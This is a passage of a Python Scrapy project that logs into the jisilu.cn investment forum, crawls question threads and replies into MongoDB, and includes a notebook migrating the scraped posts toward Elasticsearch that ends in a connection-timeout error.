回帖按照日期 32 | DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC' 33 | MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}' 34 | 35 | def __init__(self, daily='yes', *args, **kwargs): 36 | super().__init__(*args, **kwargs) 37 | 38 | if daily == 'yes': 39 | self.DAYS = config.DAYS 40 | self.URL = self.POST_DATE_URL 41 | 42 | elif daily == 'no': 43 | # 全站爬取 44 | self.logger.info('全站爬取') 45 | self.DAYS = 365 * 2 # 获取2年的帖子 46 | self.URL = self.RESP_DATE_URL # 根据回复时间 47 | else: 48 | return 49 | self.last_week = datetime.datetime.now() + datetime.timedelta(days=-1 * self.DAYS) 50 | 51 | 52 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}' 53 | self.db = pymongo.MongoClient(connect_uri) 54 | # self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ,然后找到用户的id,在用户也的源码哪里可以找到 比如持有封基是8132 55 | self.collection = self.db[config.db_name][config.doc_name] 56 | 57 | def start_requests(self): 58 | 59 | login_url = 'https://www.jisilu.cn/login/' 60 | headersx = { 61 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 62 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8', 63 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 64 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/', 65 | 'Upgrade-Insecure-Requests': '1', 66 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'} 67 | 68 | yield Request(url=login_url, headers=headersx, callback=self.login, dont_filter=True) 69 | 70 | def login(self, response): 71 | url = 'https://www.jisilu.cn/account/ajax/login_process/' 72 | username = decoder(config.jsl_user) 73 | jsl_password = 
decoder(config.jsl_password) 74 | data = { 75 | 'return_url': 'https://www.jisilu.cn/', 76 | 'user_name': username, 77 | 'password': jsl_password, 78 | 'net_auto_login': '1', 79 | '_post_type': 'ajax', 80 | } 81 | 82 | yield FormRequest( 83 | url=url, 84 | headers=self.headers, 85 | formdata=data, 86 | callback=self.parse, 87 | dont_filter=True 88 | ) 89 | 90 | def parse(self, response, **kwargs): 91 | # print('登录后', response.text) 92 | focus_url = self.URL.format(self.start_page) 93 | 94 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_page, dont_filter=True, 95 | meta={'page': self.start_page}) 96 | 97 | def parse_page(self, response): 98 | 99 | current_page = response.meta['page'] 100 | 101 | nodes = response.xpath('//div[@class="aw-question-list"]/div') 102 | last_resp_date = None 103 | 104 | for node in nodes: 105 | 106 | each_url = node.xpath('.//h4/a/@href').extract_first() 107 | try: 108 | last_resp_date = node.xpath('.//div[@class="aw-questoin-content"]/span/text()').extract()[-1].strip() 109 | # '回复 • 2018-12-10 09:49 • 46335 次浏览' 110 | last_resp_date = re.search('• (.*?) •', last_resp_date).group(1) 111 | except: 112 | logging.error('failed to find date') 113 | continue 114 | else: 115 | # 访问详情 116 | # 替换成这个 'https://www.jisilu.cn/question/320215&sort_key=agree_count&sort=DESC' 117 | # '"https://www.jisilu.cn/question/336326"' 118 | if re.search('www.jisilu.cn/question/\d+', each_url): 119 | question_id = re.search('www\.jisilu\.cn/question/(\d+)', each_url).group(1) 120 | 121 | # if self.question_exist(question_id): 122 | # continue 123 | 124 | # print(f'{question_id}帖子不存在,下载') 125 | 126 | last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M') 127 | yield Request(url=self.DETAIL_URL.format(question_id), headers=self.headers, 128 | callback=self.check_detail, 129 | meta={'last_resp_date': last_resp_date, 'question_id': question_id}) 130 | 131 | # 继续翻页 132 | # print(last_resp_date) 133 | if last_resp_date is not None and isinstance(last_resp_date,str): 134 | last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M') 135 | 136 | if last_resp_date is not None and (self.last_week < last_resp_date): 137 | # logging.info('last_resp_date ===== {}'.format(last_resp_date)) 138 | 139 | current_page += 1 140 | yield Request(url=self.URL.format(current_page), headers=self.headers, callback=self.parse_page, 141 | meta={'page': current_page}) 142 | 143 | def question_exist(self,_id): 144 | return True if self.collection.find_one({'question_id':_id},{'_id':1}) else False 145 | 146 | def compose_content(self,content_list): 147 | string = "" 148 | for line in content_list: 149 | line = line.strip() 150 | if len(line)>0: 151 | string+=line+'\n' 152 | return string 153 | 154 | def check_detail(self, response): 155 | 156 | if '您访问的资源需要购买会员' in response.text: 157 | return 158 | 159 | question_id = response.meta['question_id'] 160 | last_resp_date=response.meta['last_resp_date'] 161 | more_page = response.xpath('//div[@class="pagination pull-right"]') 162 | 163 | item = JslItem() 164 | item['last_resp_date'] = last_resp_date 165 | 166 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first() 167 | item['question_id'] = question_id 168 | content_node = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]') 169 | 170 | content_html = content_node.extract_first() # 获取到源码 171 | 172 | # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first() 173 | # 
ret = re.findall('(.*?)\.donate_user_avatar', s, re.S) 174 | # try: 175 | # content = ret[0].strip() 176 | # except Exception as e: 177 | # # logging.error(e) 178 | # content = None 179 | 180 | content_list = content_node.xpath('string(.)').extract() 181 | content_str = self.compose_content(content_list) 182 | 183 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first() 184 | # 'aw-question-detail-meta' 185 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+') 186 | 187 | url = response.url 188 | 189 | # 添加发起人 190 | try: 191 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first() 192 | except Exception as e: 193 | # logging.error(e) 194 | item['creator'] = None 195 | 196 | item['title'] = title.strip() 197 | item['content'] = content_str 198 | item['content_html'] = content_html 199 | 200 | try: 201 | item['resp_no'] = int(resp_no) 202 | except Exception as e: 203 | # logging.warning('没有回复') 204 | item['resp_no'] = 0 205 | if createTime is None: 206 | # print(title) 207 | # print(content) 208 | return 209 | item['createTime'] = createTime.replace('发表时间 ', '') 210 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') 211 | item['url'] = url.strip().replace('&sort_key=agree_count&sort=DESC','') 212 | 213 | # 多页 214 | if more_page: 215 | 216 | total_resp_no = item['resp_no'] 217 | total_page = total_resp_no // 100 + 1 218 | item['resp'] = [] 219 | 220 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers, 221 | callback=self.multi_page_detail, 222 | meta={'question_id': question_id, 'page': 1, 'total_page': total_page, 223 | 'item': item}) 224 | 225 | else: 226 | 227 | resp_ = [] 228 | # 回复内容 229 | for index, reply in enumerate( 230 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 231 | replay_user = reply.xpath( 232 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 233 | rep_content = reply.xpath( 234 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath( 235 | 'string(.)').extract_first() 236 | # rep_content = '\n'.join(rep_content) 237 | 238 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 239 | if agree is None: 240 | agree = 0 241 | else: 242 | agree = int(agree) 243 | 244 | resp_.append( 245 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}}) 246 | 247 | item['resp'] = resp_ 248 | item['only_add']=True 249 | 250 | yield item 251 | 252 | # 详情页 253 | def multi_page_detail(self, response): 254 | 255 | current_page = response.meta['page'] 256 | item = response.meta['item'] 257 | total_page = response.meta['total_page'] 258 | question_id = response.meta['question_id'] 259 | 260 | resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div') 261 | 262 | for index, reply in enumerate( 263 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 264 | replay_user = reply.xpath( 265 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 266 | rep_content = reply.xpath( 267 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath( 268 | 'string(.)').extract_first() 269 | if rep_content: 270 | rep_content = rep_content.strip() 271 | # rep_content = 
'\n'.join(rep_content) 272 | 273 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 274 | if agree is None: 275 | agree = 0 276 | else: 277 | agree = int(agree) 278 | 279 | item['resp'].append( 280 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}}) 281 | 282 | current_page += 1 283 | # item['resp_no']=len(item['resp']) 284 | if current_page <= total_page: 285 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers, 286 | callback=self.multi_page_detail, 287 | meta={'question_id': question_id, 'page': current_page, 'total_page': total_page, 288 | 'item': item}) 289 | else: 290 | item['only_add']=True 291 | yield item 292 | -------------------------------------------------------------------------------- /jsl/spiders/questions.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import datetime 3 | import re 4 | import scrapy 5 | from scrapy import Request, FormRequest 6 | from jsl.items import JslItem 7 | from jsl import config 8 | import logging 9 | import pymongo 10 | 11 | # 遍历所有questions id 看从哪里开始 12 | class QuestionSpider(scrapy.Spider): 13 | name = 'questions' 14 | 15 | headers = { 16 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache', 17 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01', 18 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest', 19 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36', 20 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', 21 | 'Referer': 'https://www.jisilu.cn/login/', 22 | 'Accept-Encoding': 'gzip,deflate,br', 23 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8' 24 | } 25 | 26 | POST_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-add_time__category-__day-0__is_recommend-__page-{}' # 发帖日期 27 | RESP_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-new__category-__day-0__is_recommend-__page-{}' # 回帖按照日期 28 | DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC' 29 | MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}' 30 | 31 | # self.doc = 32 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}' 33 | db = pymongo.MongoClient(connect_uri) 34 | # self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ,然后找到用户的id,在用户也的源码哪里可以找到 比如持有封基是8132 35 | # self.collection = self.db['db_parker']['jsl_20181108_allQuestion_test'] 36 | collection = db['db_parker'][config.doc_name] 37 | 38 | def start_requests(self): 39 | login_url = 'https://www.jisilu.cn/login/' 40 | headers = { 41 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 42 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8', 43 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 44 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/', 45 | 'Upgrade-Insecure-Requests': '1', 46 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'} 47 | 48 | yield Request(url=login_url, headers=headers, callback=self.login, dont_filter=True) 49 | 50 | def login(self, response): 51 | url = 'https://www.jisilu.cn/account/ajax/login_process/' 52 | data = { 53 | 'return_url': 
'https://www.jisilu.cn/', 54 | 'user_name': config.jsl_user, 55 | 'password': config.jsl_password, 56 | 'net_auto_login': '1', 57 | '_post_type': 'ajax', 58 | } 59 | 60 | yield FormRequest( 61 | url=url, 62 | headers=self.headers, 63 | formdata=data, 64 | callback=self.parse, 65 | ) 66 | 67 | def question_exist(self,_id): 68 | return True if self.collection.find_one({'question_id':_id},{'_id':1}) else False 69 | 70 | def parse(self, response,**kwargs): 71 | lastest_id = config.LASTEST_ID # 72 | 73 | for i in range(lastest_id + 5000, 1, -1): 74 | if not self.question_exist(str(i)): 75 | focus_url = 'https://www.jisilu.cn/question/{}'.format(i) 76 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_item, meta={'question_id': str(i)}) 77 | def compose_content(self,content_list): 78 | string = "" 79 | for line in content_list: 80 | line = line.strip() 81 | if len(line)>0: 82 | string+=line+'\n' 83 | return string 84 | 85 | def parse_item(self, response): 86 | item = JslItem() 87 | question_id = response.meta['question_id'] 88 | 89 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first() 90 | 91 | # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first() 92 | 93 | # if s: 94 | # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S) 95 | # else: 96 | # ret = None 97 | 98 | # try: 99 | # content = ret[0].strip() 100 | # except: 101 | # content = None 102 | 103 | 104 | content_node = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]') 105 | 106 | content_html = content_node.extract_first() # 获取到源码 107 | 108 | # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first() 109 | # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S) 110 | # try: 111 | # content = ret[0].strip() 112 | # except Exception as e: 113 | # # logging.error(e) 114 | # content = None 115 | 116 | content_list = content_node.xpath('string(.)').extract() 117 | content_str = self.compose_content(content_list) 118 | 119 | 120 | 121 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first() 122 | if createTime is None: 123 | return 124 | 125 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+') 126 | 127 | url = response.url 128 | 129 | # 添加发起人 130 | try: 131 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first() 132 | except Exception as e: 133 | print(e) 134 | item['creator'] = None 135 | 136 | 137 | try: 138 | title = title.strip() 139 | except Exception as e: 140 | title = None 141 | 142 | item['content'] = content_str 143 | 144 | item['content_html'] = content_html 145 | 146 | try: 147 | item['resp_no'] = int(resp_no) 148 | except Exception as e: 149 | # logging.warning(e) 150 | # logging.warning('没有回复') 151 | item['resp_no'] = 0 152 | 153 | item['title'] = title 154 | item['question_id'] = question_id 155 | 156 | createTime = createTime.strip() 157 | 158 | if not re.search('^\d', createTime): 159 | createTime = createTime.replace('发表时间 ', '') 160 | # createTime = None 161 | # self.logger.error('创建日期有误:{}'.format(url)) 162 | if not re.match('\d{4}-\d{2}-\d{2} \d{2}:\d{2}', createTime): 163 | self.logger.error('创建日期有误:{}'.format(url)) 164 | self.logger.error(createTime) 165 | createTime = None 166 | # 167 | item['createTime'] = createTime 168 | item['url'] = 
url.strip().replace('&sort_key=agree_count&sort=DESC','') 169 | 170 | resp = [] 171 | last_resp_date = None 172 | for index, reply in enumerate( 173 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 174 | replay_user = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 175 | 176 | if last_resp_date is None: 177 | last_resp_date = reply.xpath('.//div[@class="aw-dynamic-topic-meta"]/span/text()').extract_first() 178 | 179 | rep_content = reply.xpath( 180 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first() 181 | # print rep_content 182 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 183 | try: 184 | int(agree) 185 | except: 186 | agree = 0 187 | 188 | resp.append({replay_user.strip() + '_{}'.format(index): [int(agree), rep_content.strip()]}) 189 | # item['html'] = response.text 190 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') 191 | 192 | item['resp'] = resp 193 | item['last_resp_date'] = last_resp_date 194 | item['only_add'] = True 195 | yield item 196 | 197 | def check_detail(self, response): 198 | 199 | if '您访问的资源需要购买会员' in response.text: 200 | return 201 | 202 | question_id = response.meta['question_id'] 203 | more_page = response.xpath('//div[@class="pagination pull-right"]') 204 | 205 | item = JslItem() 206 | last_resp_date = None # 后期更新 207 | 208 | item['last_resp_date'] = last_resp_date 209 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first() 210 | s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first() 211 | ret = re.findall('(.*?)\.donate_user_avatar', s, re.S) 212 | item['question_id'] = question_id 213 | 214 | try: 215 | content = ret[0].strip() 216 | except Exception as e: 217 | logging.error(e) 218 | content = None 219 | 220 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first() 221 | # 'aw-question-detail-meta' 222 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+') 223 | 224 | url = response.url 225 | 226 | # 添加发起人 227 | try: 228 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first() 229 | except Exception as e: 230 | logging.error(e) 231 | item['creator'] = None 232 | 233 | item['title'] = title.strip() 234 | item['content'] = content 235 | try: 236 | item['resp_no'] = int(resp_no) 237 | except Exception as e: 238 | # logging.warning('没有回复') 239 | item['resp_no'] = 0 240 | 241 | item['createTime'] = createTime.replace('发表时间 ', '') 242 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') 243 | item['url'] = url.strip() 244 | # item['html'] = response.text 245 | item['last_resp_date'] = response.meta['last_resp_date'] 246 | 247 | # 多页 248 | if more_page: 249 | 250 | total_resp_no = item['resp_no'] 251 | total_page = total_resp_no // 100 + 1 252 | item['resp'] = [] 253 | 254 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers, 255 | callback=self.multi_page_detail, 256 | meta={'question_id': question_id, 'page': 1, 'total_page': total_page, 257 | 'item': item}) 258 | 259 | else: 260 | 261 | resp_ = [] 262 | # 回复内容 263 | for index, reply in enumerate( 264 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 265 | replay_user = 
reply.xpath( 266 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 267 | rep_content = reply.xpath( 268 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath( 269 | 'string(.)').extract_first() 270 | # rep_content = '\n'.join(rep_content) 271 | 272 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 273 | if agree is None: 274 | agree = 0 275 | else: 276 | agree = int(agree) 277 | 278 | resp_.append( 279 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}}) 280 | 281 | item['resp'] = resp_ 282 | 283 | yield item 284 | 285 | # 详情页 286 | def multi_page_detail(self, response): 287 | 288 | current_page = response.meta['page'] 289 | item = response.meta['item'] 290 | total_page = response.meta['total_page'] 291 | question_id = response.meta['question_id'] 292 | 293 | resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div') 294 | 295 | for index, reply in enumerate( 296 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 297 | replay_user = reply.xpath( 298 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 299 | rep_content = reply.xpath( 300 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath( 301 | 'string(.)').extract_first() 302 | if rep_content: 303 | rep_content = rep_content.strip() 304 | # rep_content = '\n'.join(rep_content) 305 | 306 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 307 | if agree is None: 308 | agree = 0 309 | else: 310 | agree = int(agree) 311 | 312 | item['resp'].append( 313 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}}) 314 | 315 | current_page += 1 316 | 317 | if current_page <= total_page: 318 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers, 319 | callback=self.multi_page_detail, 320 | meta={'question_id': question_id, 'page': current_page, 'total_page': total_page, 321 | 'item': item}) 322 | else: 323 | yield item 324 | -------------------------------------------------------------------------------- /数据迁移.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 30, 6 | "metadata": {}, 7 | "outputs": [], 8 | "source": [ 9 | "import pymongo\n", 10 | "from elasticsearch import Elasticsearch" 11 | ] 12 | }, 13 | { 14 | "cell_type": "code", 15 | "execution_count": 31, 16 | "metadata": {}, 17 | "outputs": [], 18 | "source": [ 19 | "db = pymongo.MongoClient('10.18.6.46',27001)" 20 | ] 21 | }, 22 | { 23 | "cell_type": "code", 24 | "execution_count": 32, 25 | "metadata": {}, 26 | "outputs": [], 27 | "source": [ 28 | "es = Elasticsearch(['10.18.6.102:9200'])" 29 | ] 30 | }, 31 | { 32 | "cell_type": "code", 33 | "execution_count": 11, 34 | "metadata": {}, 35 | "outputs": [], 36 | "source": [ 37 | "doc = db['db_parker']['jsl']" 38 | ] 39 | }, 40 | { 41 | "cell_type": "code", 42 | "execution_count": 12, 43 | "metadata": {}, 44 | "outputs": [], 45 | "source": [ 46 | "item = doc.find_one()" 47 | ] 48 | }, 49 | { 50 | "cell_type": "code", 51 | "execution_count": 13, 52 | "metadata": { 53 | "scrolled": true 54 | }, 55 | "outputs": [ 56 | { 57 | "data": { 58 | "text/plain": [ 59 | "{'_id': ObjectId('5c249f29c4c05d4ba4bfa49d'),\n", 
60 | " 'creator': 'greatbear',\n", 61 | " 'title': '各位研究技术指标有什么心得体会?',\n", 62 | " 'content': '各位研究技术指标多久了?研究这东西,能帮炒股赚钱么:)',\n", 63 | " 'resp_no': 11,\n", 64 | " 'createTime': '2018-12-14 08:38',\n", 65 | " 'crawlTime': '2019-03-16 09:54:43',\n", 66 | " 'url': 'https://www.jisilu.cn/question/297952',\n", 67 | " 'resp': [{'seeker24680_0': ['0', '可以说很多不明觉厉的词,适合用于忽悠别人,具体效果同风水先生。']},\n", 68 | " {'joyfulli_1': ['0',\n", 69 | " '首先要知道技术指标是怎么来的\\n对过去的数据进行统计分析,然后进行预测\\n说白了就是统计学\\n所以,学过统计学就知道技术分析怎么用了']},\n", 70 | " {'老高0813_2': ['0', '基本没卵用']},\n", 71 | " {'z383788052_3': ['0', '从来只看指标,只看k']},\n", 72 | " {'花园小琴_4': ['0', '看图形,一般只看低买高卖,但事后后悔,赚少了']},\n", 73 | " {'风险搬运工_5': ['0', '趋势(多和空)和震荡结合得做(同时做),不做单边、所谓轮动策略。\\n倾向于胜率低,赔率高的策略。']},\n", 74 | " {'smag_6': ['0', '基本不看指标,静下心感受波动,在波动中下注。。。']},\n", 75 | " {'海浪头头_7': ['0', '同意美棠子的看法']},\n", 76 | " {'jsl0900_8': ['0', '从技术指标上看,我可以预测所有交易标的的后续走势,至于准确不准确,那不是我关心的问题']},\n", 77 | " {'美棠子_9': ['4', '只是个辅助工具,基本面是核心,切不可颠倒主次。']},\n", 78 | " {'蔓越橘_10': ['0', '用于T一下可以,其他就算了吧。']}],\n", 79 | " 'last_resp_date': '2018-12-14 10:14'}" 80 | ] 81 | }, 82 | "execution_count": 13, 83 | "metadata": {}, 84 | "output_type": "execute_result" 85 | } 86 | ], 87 | "source": [ 88 | "item" 89 | ] 90 | }, 91 | { 92 | "cell_type": "code", 93 | "execution_count": 14, 94 | "metadata": {}, 95 | "outputs": [], 96 | "source": [ 97 | "keys= item.keys()" 98 | ] 99 | }, 100 | { 101 | "cell_type": "code", 102 | "execution_count": 15, 103 | "metadata": {}, 104 | "outputs": [ 105 | { 106 | "data": { 107 | "text/plain": [ 108 | "dict_keys(['_id', 'creator', 'title', 'content', 'resp_no', 'createTime', 'crawlTime', 'url', 'resp', 'last_resp_date'])" 109 | ] 110 | }, 111 | "execution_count": 15, 112 | "metadata": {}, 113 | "output_type": "execute_result" 114 | } 115 | ], 116 | "source": [ 117 | "keys" 118 | ] 119 | }, 120 | { 121 | "cell_type": "code", 122 | "execution_count": 34, 123 | "metadata": {}, 124 | "outputs": [], 125 | "source": [ 126 | "save_db = db['db_parker']['jsl_note']" 127 | ] 128 | }, 129 | { 130 | "cell_type": "code", 131 | "execution_count": 24, 132 | "metadata": {}, 133 | "outputs": [], 134 | "source": [ 135 | "import datetime" 136 | ] 137 | }, 138 | { 139 | "cell_type": "code", 140 | "execution_count": 37, 141 | "metadata": { 142 | "scrolled": true 143 | }, 144 | "outputs": [ 145 | { 146 | "ename": "AutoReconnect", 147 | "evalue": "10.18.6.46:27001: [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。", 148 | "output_type": "error", 149 | "traceback": [ 150 | "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", 151 | "\u001b[1;31mTimeoutError\u001b[0m Traceback (most recent call last)", 152 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36mreceive_message\u001b[1;34m(self, request_id)\u001b[0m\n\u001b[0;32m 609\u001b[0m return receive_message(self.sock, request_id,\n\u001b[1;32m--> 610\u001b[1;33m self.max_message_size)\n\u001b[0m\u001b[0;32m 611\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mBaseException\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 153 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\network.py\u001b[0m in \u001b[0;36mreceive_message\u001b[1;34m(sock, request_id, max_message_size)\u001b[0m\n\u001b[0;32m 172\u001b[0m length, _, response_to, op_code = _UNPACK_HEADER(\n\u001b[1;32m--> 173\u001b[1;33m _receive_data_on_socket(sock, 16))\n\u001b[0m\u001b[0;32m 174\u001b[0m 
\u001b[1;31m# No request_id for exhaust cursor \"getMore\".\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 154 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\network.py\u001b[0m in \u001b[0;36m_receive_data_on_socket\u001b[1;34m(sock, length)\u001b[0m\n\u001b[0;32m 231\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 232\u001b[1;33m \u001b[0mchunk_length\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0msock\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mrecv_into\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mmv\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mbytes_read\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 233\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[1;33m(\u001b[0m\u001b[0mIOError\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mOSError\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0mexc\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 155 | "\u001b[1;31mTimeoutError\u001b[0m: [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。", 156 | "\nDuring handling of the above exception, another exception occurred:\n", 157 | "\u001b[1;31mAutoReconnect\u001b[0m Traceback (most recent call last)", 158 | "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m()\u001b[0m\n\u001b[0;32m 1\u001b[0m \u001b[0murl_set\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mset\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 2\u001b[1;33m \u001b[1;32mfor\u001b[0m \u001b[0mitem\u001b[0m \u001b[1;32min\u001b[0m \u001b[0mdoc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mfind\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 3\u001b[0m \u001b[0mcreator\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mitem\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'creator'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 4\u001b[0m 